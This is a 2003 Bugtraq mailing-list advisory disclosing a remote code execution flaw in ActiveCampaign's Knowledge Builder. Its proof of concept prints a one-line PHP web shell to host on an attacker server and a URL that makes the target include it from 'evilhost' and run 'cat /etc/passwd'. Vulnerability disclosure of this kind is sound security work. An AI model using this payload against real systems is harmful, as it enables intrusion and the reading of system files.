[32947] in bugtraq
Remote Code Execution in Knowledge Builder.
daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Fri Dec 26 16:21:01 2003
Date: 24 Dec 2003 13:45:22 -0000
Message-ID: <20031224134522.10910.qmail@sf-www2-symnsj.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Remote Code Execution in Knowledge Builder.
"Knowledge Builder" from www.activecampaign.com allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
